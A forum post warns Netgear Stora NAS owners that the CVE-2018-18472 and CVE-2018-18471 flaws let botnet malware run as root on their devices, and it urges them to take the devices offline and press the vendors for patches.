Houston we have problem vulnerabilities for Netgear stora ( CVE-2018-18472 and CVE-2018-18471)
Like I said in my last message i was worried about how did this malware got there ?
look at this : https://www.wizcase.com/blog/hack-2018/ a major vulnerability got reported in october 2018 affecting our Stora and others nas
just know that now something is running on your nas as root, so it has access to every file on your nas, read and delete etc, upload them somewhere and use the nas as a jumping ground to attack others device on your network. Can also be used by the hacker to ddos some site etc. evey 15 min it call home and check for instructions.
I don't know if a reset of the device would remove the botnet, I myself desactivated it on my nas, but i'm experienced with linux and i'm just monitoring if it will come back, i've removed the piece of software and disabled the scheduled job that would call home and re-install it.
Hope hipserv / netgear would do something, but this device is legacy stuff now. Don't think we should hold our breath, time to look for another device i guess.
This is serious, basically you can resume it as this :
- If you are using one of the above devices and they are connected on the WAN, make sure to remove your device from the internet. (Make sure they are running only locally in safe network)
- Make sure to contact the affected vendors and insist they release a patch as soon possible!